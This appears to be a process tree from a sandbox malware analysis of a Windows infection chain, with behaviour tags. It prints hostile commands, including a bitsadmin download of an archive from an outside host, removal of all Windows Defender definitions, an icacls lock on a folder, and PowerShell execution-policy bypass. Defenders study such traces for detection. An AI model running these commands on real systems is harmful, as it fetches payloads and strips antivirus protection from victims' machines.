C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFE00.tmp\tempfile.ps1"7⤵PID:3564
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFE00.tmp\tempfile.ps1"7⤵PID:2780
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFE00.tmp\tempfile.ps1"7⤵PID:2192
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFE00.tmp\tempfile.ps1"7⤵PID:4080
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z7⤵
- Download via BitsAdmin
PID:1560
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\luyvkarp.tv3\GcleanerWW.exe /mixone & exit5⤵PID:3952
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b33ojtv0.zhg\inst.exe & exit5⤵PID:2968
-
C:\Users\Admin\AppData\Local\Temp\b33ojtv0.zhg\inst.exeC:\Users\Admin\AppData\Local\Temp\b33ojtv0.zhg\inst.exe6⤵PID:2092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5dxlmsa1.lyl\c7ae36fa.exe & exit5⤵PID:2744
-
C:\Users\Admin\AppData\Local\Temp\5dxlmsa1.lyl\c7ae36fa.exeC:\Users\Admin\AppData\Local\Temp\5dxlmsa1.lyl\c7ae36fa.exe6⤵PID:2812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vlk1tdaa.ara\app.exe /8-2222 & exit5⤵PID:3168
-
C:\Users\Admin\AppData\Local\Temp\vlk1tdaa.ara\app.exeC:\Users\Admin\AppData\Local\Temp\vlk1tdaa.ara\app.exe /8-22226⤵PID:3184
-
C:\Users\Admin\AppData\Local\Temp\vlk1tdaa.ara\app.exe"C:\Users\Admin\AppData\Local\Temp\vlk1tdaa.ara\app.exe" /8-22227⤵PID:3232
-
-
-
-
-
-
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3216
-
C:\Users\Admin\AppData\Local\Temp\9EDE.exeC:\Users\Admin\AppData\Local\Temp\9EDE.exe1⤵PID:3016
-
C:\Users\Admin\AppData\Local\Temp\A1CC.exeC:\Users\Admin\AppData\Local\Temp\A1CC.exe1⤵PID:2092
-
C:\Users\Admin\AppData\Local\Temp\B59B.exeC:\Users\Admin\AppData\Local\Temp\B59B.exe1⤵PID:2864
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\0b8e790d-bf69-4473-9a1e-bbce59ce44bb" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
PID:788
-
-
C:\Users\Admin\AppData\Local\Temp\B59B.exe"C:\Users\Admin\AppData\Local\Temp\B59B.exe" --Admin IsNotAutoStart IsNotTask2⤵PID:2840
-
C:\Users\Admin\AppData\Local\0d50caf0-38c2-4805-bbac-f4ab9fe228be\updatewin1.exe"C:\Users\Admin\AppData\Local\0d50caf0-38c2-4805-bbac-f4ab9fe228be\updatewin1.exe"3⤵PID:3732
-
C:\Users\Admin\AppData\Local\0d50caf0-38c2-4805-bbac-f4ab9fe228be\updatewin1.exe"C:\Users\Admin\AppData\Local\0d50caf0-38c2-4805-bbac-f4ab9fe228be\updatewin1.exe" --Admin4⤵PID:1944
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned5⤵PID:3696
-
-
C:\Program Files\Windows Defender\mpcmdrun.exe"C:\Program Files\Windows Defender\mpcmdrun.exe" -removedefinitions -all5⤵
- Deletes Windows Defender Definitions
PID:2628
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Admin\AppData\Local\script.ps1""' -Verb RunAs}"5⤵PID:2960
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\delself.bat""5⤵PID:2880
-
-
-
-
C:\Users\Admin\AppData\Local\0d50caf0-38c2-4805-bbac-f4ab9fe228be\updatewin2.exe"C:\Users\Admin\AppData\Local\0d50caf0-38c2-4805-bbac-f4ab9fe228be\updatewin2.exe"3⤵PID:3416
-
-
C:\Users\Admin\AppData\Local\0d50caf0-38c2-4805-bbac-f4ab9fe228be\5.exe"C:\Users\Admin\AppData\Local\0d50caf0-38c2-4805-bbac-f4ab9fe228be\5.exe"3⤵PID:3972
-
-
-
C:\Users\Admin\AppData\Local\Temp\BADA.exeC:\Users\Admin\AppData\Local\Temp\BADA.exe1⤵PID:3252
-
C:\Users\Admin\AppData\Local\Temp\C621.exeC:\Users\Admin\AppData\Local\Temp\C621.exe1⤵PID:2852
-
C:\Users\Admin\AppData\Local\Temp\F9DE.exeC:\Users\Admin\AppData\Local\Temp\F9DE.exe1⤵PID:3292
-
C:\Users\Admin\AppData\Local\Temp\FCCC.exeC:\Users\Admin\AppData\Local\Temp\FCCC.exe1⤵PID:3596
-
C:\Users\Admin\AppData\Local\Temp\545.exeC:\Users\Admin\AppData\Local\Temp\545.exe1⤵PID:1316
-
C:\Users\Admin\zqywgbiw.exe"C:\Users\Admin\zqywgbiw.exe" /d"C:\Users\Admin\AppData\Local\Temp\545.exe" /e55031110000000052⤵PID:2328
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3996
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:876